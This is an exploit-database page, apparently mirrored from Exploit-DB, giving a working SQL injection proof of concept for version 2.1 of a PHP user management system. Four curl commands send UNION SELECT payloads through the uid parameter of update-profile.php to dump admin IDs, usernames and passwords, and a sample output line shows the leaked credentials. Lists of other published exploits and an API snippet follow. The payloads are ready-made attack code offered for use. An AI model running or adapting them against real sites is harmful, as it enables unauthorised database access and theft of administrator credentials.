To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"User Registration & Login and User Management System 2.1 - SQL Injection"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
# Dork: N/A
# Date: 2020-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 2.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
#
# <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" >
#
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-02-07 "QuickDate 1.3.2 - SQL Injection" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - Remote Code Execution" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - Cross Site Request Forgery (Add User)" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - 'user_email' SQL Injection" webapps php "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)" webapps json "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Information Disclosure (User Enumeration)" webapps json "Ihsan Sencan"
2019-01-28 "Mess Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Teameyo Project Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component JHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component J-CruisePortal 6.0.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "SimplePress CMS 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vReview 1.9.11 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vWishlist 1.0.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vRestaurant 1.9.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - Remote Code Execution" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component VMap 1.9.6 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection" webapps php "Ihsan Sencan"
2019-01-22 "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "Coman 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "PHP Uber-style GeoTracking 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Kepler Wallpaper Script 1.1 - SQL Injection" webapps php "Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48932/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.